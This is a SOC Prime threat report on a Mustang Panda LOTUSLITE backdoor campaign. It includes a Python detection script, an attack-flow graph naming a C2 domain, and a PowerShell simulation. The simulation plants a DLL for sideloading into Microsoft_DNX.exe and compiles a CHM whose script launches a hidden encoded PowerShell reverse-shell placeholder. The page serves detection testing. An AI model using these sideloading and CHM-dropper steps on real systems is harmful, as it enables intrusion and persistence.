SOC Prime Bias: Critical

22 Apr 2026 18:58

Same packet, different magic: Mustang Panda hits India’s banking sector and Korea geopolitics

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

The Acronis Threat Research Unit uncovered a new LOTUSLITE backdoor variant targeting organizations in India’s banking sector and individuals connected to South Korean diplomatic affairs. The malware is deployed through DLL sideloading, relying on a legitimate Microsoft-signed executable to load a malicious library, then communicating with a dynamic DNS-based command-and-control server over HTTPS. Based on infrastructure patterns and tradecraft overlaps, researchers attributed the activity to Mustang Panda with moderate confidence.

Investigation

Analysts examined a malicious CHM file, a JavaScript-based loader, and a signed Microsoft_DNX.exe binary that sideloaded a DLL carrying the LOTUSLITE payload. Their analysis revealed updates in exported functions, mutex naming conventions, command-line switches, packet magic values, and API resolution methods. The team also linked the operation to earlier Mustang Panda campaigns through reused Dynu-managed domains and associated IP infrastructure.

Mitigation

Defenders should prevent unauthorized DLL loading into trusted Microsoft-signed executables, monitor for the identified mutex patterns and modified command-line arguments, and apply strict controls around dynamic DNS traffic. Security teams should also detect the distinctive packet magic value 0xB2EBCFDF and watch for suspicious HKCU Run key modifications that may indicate persistence. Because the C2 channel is HTTPS, the magic value is only observable where TLS is terminated or inspected (a decrypting proxy, endpoint network hooks, or process memory); at the network edge, the Dynu-managed dynamic DNS domains and the associated IP infrastructure are the practical indicators.

Response

If this activity is detected, isolate the impacted system immediately, terminate the malicious process, and remove both the sideloaded DLL and the abused executable from disk. Memory should be captured for forensic analysis, exposed credentials should be revoked, and the identified command-and-control domains and IP address should be blocked. A broader hunt should also be performed across the environment for the mutex and registry-based persistence artifacts tied to the campaign.
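The checks called for in the Mitigation and Response sections, expressed as runnable detection logic. This is an added example in Python; it is not SOC Prime's rule content and nothing in it comes from the Acronis report. It runs over a handful of constructed Sysmon-style events (Event ID 1 process creation, Event ID 7 image load, Event ID 13 registry value set) and a constructed byte string. The paths, process names and event values are assumptions chosen to exercise each rule. The page does not give the mutex names, so no mutex check is included, and because it does not state the byte order in which 0xB2EBCFDF appears on the wire, both encodings are searched.

```python
import re
import struct
from pathlib import PureWindowsPath

# Packet magic named in the Mitigation section. The page does not say which
# byte order the implant puts on the wire, so both encodings are searched.
PACKET_MAGIC = 0xB2EBCFDF
MAGIC_BYTES = {
    "little-endian": struct.pack("<I", PACKET_MAGIC),  # DF CF EB B2
    "big-endian": struct.pack(">I", PACKET_MAGIC),     # B2 EB CF DF
}
ABUSED_HOST = "microsoft_dnx.exe"
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# Sysmon records HKCU as HKU\<SID>\..., so match the subkey, not the hive name.
RUN_KEY_RE = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run\\", re.I)
USER_WRITABLE_RE = re.compile(r"\\(users|temp|programdata)\\", re.I)


def _name(path):
    return PureWindowsPath(path).name.lower()


def _folder(path):
    return str(PureWindowsPath(path).parent).lower()


def detect_sideload(ev):
    """EID 7: the signed host loads an unsigned DLL from its own directory."""
    if ev.get("EventID") != 7 or _name(ev["Image"]) != ABUSED_HOST:
        return None
    if ev.get("Signed", "false").lower() == "true":
        return None
    if _folder(ev["ImageLoaded"]) != _folder(ev["Image"]):
        return None
    return f"dll_sideload: {ev['Image']} loaded unsigned {ev['ImageLoaded']}"


def detect_chm_child(ev):
    """EID 1: hh.exe spawning a script host, i.e. a CHM-embedded script ran."""
    if ev.get("EventID") != 1 or _name(ev.get("ParentImage", "")) != "hh.exe":
        return None
    if _name(ev["Image"]) not in SCRIPT_HOSTS:
        return None
    return f"chm_execution: hh.exe -> {ev.get('CommandLine', ev['Image'])}"


def detect_run_key(ev):
    """EID 13: Run-key value written by the abused host, or pointing at a
    user-writable path, which is where a dropped persistence target lives."""
    if ev.get("EventID") != 13 or not RUN_KEY_RE.search(ev.get("TargetObject", "")):
        return None
    by_host = _name(ev.get("Image", "")) == ABUSED_HOST
    to_user_path = bool(USER_WRITABLE_RE.search(ev.get("Details", "")))
    if not (by_host or to_user_path):
        return None
    return f"run_key_persistence: {ev['TargetObject']} = {ev.get('Details', '')}"


DETECTORS = (detect_sideload, detect_chm_child, detect_run_key)


def run_detections(events):
    """Apply every detector to every event; return the alert strings in order."""
    return [hit for ev in events for d in DETECTORS if (hit := d(ev)) is not None]


def find_packet_magic(payload):
    """Offsets (and byte order) at which the magic occurs in a decrypted C2
    body; the channel is HTTPS, so this only applies after TLS termination."""
    hits = []
    for order, needle in MAGIC_BYTES.items():
        pos = payload.find(needle)
        while pos != -1:
            hits.append((pos, order))
            pos = payload.find(needle, pos + 1)
    return sorted(hits)


# Constructed sample telemetry (not taken from the Acronis report).
SAMPLE_EVENTS = [
    {"EventID": 7, "Image": r"C:\Users\a\AppData\Local\Temp\Microsoft_DNX.exe",
     "ImageLoaded": r"C:\Users\a\AppData\Local\Temp\lotuslite.dll", "Signed": "false"},
    {"EventID": 7, "Image": r"C:\Users\a\AppData\Local\Temp\Microsoft_DNX.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll", "Signed": "true"},   # benign
    {"EventID": 1, "ParentImage": r"C:\Windows\hh.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -EncodedCommand ..."},
    {"EventID": 13, "Image": r"C:\Users\a\AppData\Local\Temp\Microsoft_DNX.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\DNX",
     "Details": r"C:\Users\a\AppData\Local\Temp\Microsoft_DNX.exe"},
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",                       # benign
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe"},
]
# Constructed C2 body: 8 header bytes, the magic as a little-endian DWORD, a length, a body.
SAMPLE_PAYLOAD = b"\x00" * 8 + struct.pack("<I", PACKET_MAGIC) + b"\x10\x00\x00\x00" + b"constructed"

if __name__ == "__main__":
    for alert in run_detections(SAMPLE_EVENTS):
        print(alert)
    print(find_packet_magic(SAMPLE_PAYLOAD))
```

The two benign events (a signed system DLL loaded into the host, and a Run entry pointing into Program Files) are there to show what each rule ignores; in production the sideload rule should also tolerate legitimately unsigned Microsoft DLLs that ship beside the executable, and the Run-key rule needs an allowlist for known installers.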

Attack Flow

    graph TB
    %% Class definitions section
    classDef action fill:#99ccff
    classDef file fill:#ffcc99
    classDef malware fill:#ff9999
    classDef process fill:#ccccff
    classDef persistence fill:#ccffcc

    %% Nodes
    action_initial_access["<b>Action</b> – <b>T1566.001 Spearphishing Attachment</b><br/>Malicious Compiled HTML Help (CHM) file sent via email."]
    class action_initial_access action
    file_chm["<b>File</b> – <b>Name</b>: Request_for_Support.chm<br/><b>Type</b>: Compiled HTML Help"]
    class file_chm file
    action_user_execution["<b>Action</b> – <b>T1204.002 User Execution</b><br/>Victim opens the CHM, triggering embedded JavaScript."]
    class action_user_execution action
    action_obfuscation["<b>Action</b> – <b>T1027 Obfuscated Files or Information</b><br/>JavaScript drops a Microsoft-signed executable and a malicious DLL using ActiveX and hidden HTML."]
    class action_obfuscation action
    file_ms_dnx["<b>File</b> – <b>Name</b>: Microsoft_DNX.exe<br/><b>Signature</b>: Microsoft signed"]
    class file_ms_dnx file
    file_lotuslite["<b>Malware</b> – <b>Name</b>: LotusLite variant DLL<br/><b>Type</b>: Dynamic Link Library"]
    class file_lotuslite malware
    action_embedded_payloads["<b>Action</b> – <b>T1027.009 Embedded Payloads</b><br/>CHM contains JavaScript (music.js) that extracts and runs the DLL and EXE."]
    class action_embedded_payloads action
    action_system_binary_proxy["<b>Action</b> – <b>T1218 System Binary Proxy Execution</b><br/>Microsoft_DNX.exe proxies execution of the malicious DLL via LoadLibraryExW."]
    class action_system_binary_proxy action
    action_trusted_dev_utilities["<b>Action</b> – <b>T1127 Trusted Developer Utilities Proxy Execution</b><br/>Abuse of Microsoft_DNX.exe, a trusted .NET runtime tool, to run the backdoor."]
    class action_trusted_dev_utilities action
    action_script_proxy["<b>Action</b> – <b>T1216 System Script Proxy Execution</b><br/>Embedded JavaScript acts as a script proxy to launch the executable."]
    class action_script_proxy action
    action_hijack_execution["<b>Action</b> – <b>T1574 Hijack Execution Flow</b><br/>DLL sideloading by placing a malicious DLL with the expected name in the executable's directory."]
    class action_hijack_execution action
    action_persistence["<b>Action</b> – <b>T1547.001 Registry Run Keys / Startup Folder</b><br/>Writes a Run key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run."]
    class action_persistence persistence
    command_and_control["<b>Command and Control</b><br/>Implant contacts dynamic-DNS domain editor.gleeze.com over HTTPS."]
    class command_and_control process

    %% Connections showing attack flow
    action_initial_access -->|delivers| file_chm
    file_chm -->|opened by victim| action_user_execution
    action_user_execution -->|triggers| action_obfuscation
    action_obfuscation -->|drops| file_ms_dnx
    action_obfuscation -->|drops| file_lotuslite
    file_ms_dnx -->|used in| action_system_binary_proxy
    file_ms_dnx -->|used in| action_trusted_dev_utilities
    action_system_binary_proxy -->|loads| file_lotuslite
    action_trusted_dev_utilities -->|executes| file_lotuslite
    action_user_execution -->|executes| action_script_proxy
    action_script_proxy -->|launches| file_ms_dnx
    action_obfuscation -->|enables| action_embedded_payloads
    action_embedded_payloads -->|provides| action_hijack_execution
    action_hijack_execution -->|facilitates| action_persistence
    action_persistence -->|establishes| command_and_control

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:

    1. Stage malicious DLL:

      • The attacker copies a malicious DLL (lotuslite.dll) into the same directory as the legitimate Microsoft_DNX.exe. This DLL contains the backdoor payload; its file name must match the DLL that Microsoft_DNX.exe resolves at load time.
    2. Execute DLL sideloading via Microsoft_DNX.exe:

      • Launching Microsoft_DNX.exe without arguments makes the loader resolve that DLL from the executable's own directory before the system directories (DLL search-order hijacking), so the planted DLL is loaded and the backdoor runs inside a Microsoft-signed process.
    3. Create malicious CHM:

      • A CHM file (evil.chm) is crafted containing JScript that, when rendered, launches a PowerShell reverse shell.
    4. Trigger JavaScript via hh.exe:

      • The attacker runs hh.exe evil.chm, causing the HTML Help executable to parse the CHM and execute the embedded script, achieving code execution under a signed binary.

    This sequence generates two distinct Sysmon Process Create (Event ID 1) events that match the detection rule's conditions: Microsoft_DNX.exe starting, and hh.exe spawning powershell.exe. The DLL load itself surfaces only as an Event ID 7 (Image loaded) record, which requires ImageLoad to be enabled in the Sysmon configuration.

  • Regression Test Script:

    # -------------------------------------------------------------------------
    # LotusLite Simulation – DLL sideloading + hh.exe CHM execution
    # -------------------------------------------------------------------------
    # Prerequisites:
    #   - Sysmon installed and forwarding logs (Event ID 1; enable ImageLoad,
    #     Event ID 7, if the DLL load itself should be visible).
    #   - Administrator privileges (required for writing to Program Files).
    #   - HTML Help Workshop (hhc.exe) to compile the CHM. makecab.exe builds
    #     .cab archives, not CHM files, and cannot be used for this step.
    #   - "lotuslite.dll" is a placeholder name: it must match the DLL that
    #     Microsoft_DNX.exe actually resolves from its own directory.
    
    $ErrorActionPreference = "Stop"
    $dnxPath = "$env:ProgramFiles\Microsoft\Microsoft_DNX.exe"
    $dnxDir  = Split-Path $dnxPath -Parent
    $workDir = "C:\Temp"
    New-Item -ItemType Directory -Path $workDir -Force | Out-Null
    
    # 1. Deploy malicious DLL (simulated payload)
    $malDllSource = Join-Path $workDir "lotuslite.dll"   # <-- replace with real payload path
    $malDllDest   = Join-Path $dnxDir "lotuslite.dll"
    Copy-Item -Path $malDllSource -Destination $malDllDest -Force
    
    # 2. Launch Microsoft_DNX.exe to trigger DLL sideloading
    Write-Host "[*] Launching Microsoft_DNX.exe for DLL sideloading..."
    Start-Process -FilePath $dnxPath -WindowStyle Hidden
    
    # 3. Create malicious CHM containing JScript (simplified example).
    #    ActiveX created from script can be blocked by the HTML Help security
    #    zone; the HHCtrl "ShortCut" OBJECT is the classic alternative launcher.
    $chmPath  = Join-Path $workDir "evil.chm"
    $tempHtml = Join-Path $workDir "evil.html"
    $tempHhp  = Join-Path $workDir "evil.hhp"
    $htmlContent = @"
    <HTML><HEAD>
    <SCRIPT language="JScript">
    var shell = new ActiveXObject("WScript.Shell");
    // <base64-rev-shell> is the page's placeholder for the encoded payload
    shell.Run("powershell -nop -w hidden -EncodedCommand <base64-rev-shell>", 0);
    </SCRIPT>
    </HEAD><BODY></BODY></HTML>
    "@
    $htmlContent | Out-File -FilePath $tempHtml -Encoding ASCII
    
    # Minimal HTML Help project file: one topic, compiled into evil.chm.
    # Paths are relative to the .hhp, so the compiler is run from $workDir.
    @"
    [OPTIONS]
    Compiled file=evil.chm
    Default topic=evil.html
    
    [FILES]
    evil.html
    "@ | Out-File -FilePath $tempHhp -Encoding ASCII
    
    $hhc = "${env:ProgramFiles(x86)}\HTML Help Workshop\hhc.exe"   # default install path
    Push-Location $workDir
    & $hhc "evil.hhp" | Out-Null      # hhc.exe exits 1 on success, so test for the output file instead
    Pop-Location
    if (-not (Test-Path $chmPath)) { throw "CHM compilation failed: $chmPath was not created" }
    
    # 4. Execute the CHM via hh.exe (hh.exe lives in %SystemRoot%, not System32)
    Write-Host "[*] Launching hh.exe on malicious CHM..."
    Start-Process -FilePath "$env:SystemRoot\hh.exe" -ArgumentList $chmPath -WindowStyle Hidden
    
    # Cleanup temporary build files (retain malicious DLL and CHM for post‑run analysis)
    Remove-Item $tempHtml, $tempHhp -Force
    Write-Host "[*] Simulation complete."
  • Cleanup Commands:

    # -------------------------------------------------------------------------
    # Cleanup for LotusLite Simulation
    # -------------------------------------------------------------------------
    $dnxPath    = "$env:ProgramFiles\Microsoft\Microsoft_DNX.exe"
    $dnxDir     = Split-Path $dnxPath -Parent
    $malDllDest = Join-Path $dnxDir "lotuslite.dll"
    $workDir    = "C:\Temp"
    $chmPath    = Join-Path $workDir "evil.chm"
    
    # Terminate lingering processes first so the files below are not locked
    Get-Process -Name "Microsoft_DNX","hh" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Remove malicious DLL
    if (Test-Path $malDllDest) {
        Remove-Item $malDllDest -Force
        Write-Host "[*] Removed malicious DLL."
    }
    
    # Remove CHM and any build artifacts the simulation left behind
    foreach ($f in @($chmPath, (Join-Path $workDir "evil.html"), (Join-Path $workDir "evil.hhp"))) {
        if (Test-Path $f) {
            Remove-Item $f -Force
            Write-Host "[*] Removed $f."
        }
    }
    
    # The simulation itself writes no Run key; if a real sample was executed,
    # review the HKCU Run key for the persistence entry before closing out.
    Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" | Format-List
    Write-Host "[*] Cleanup finished."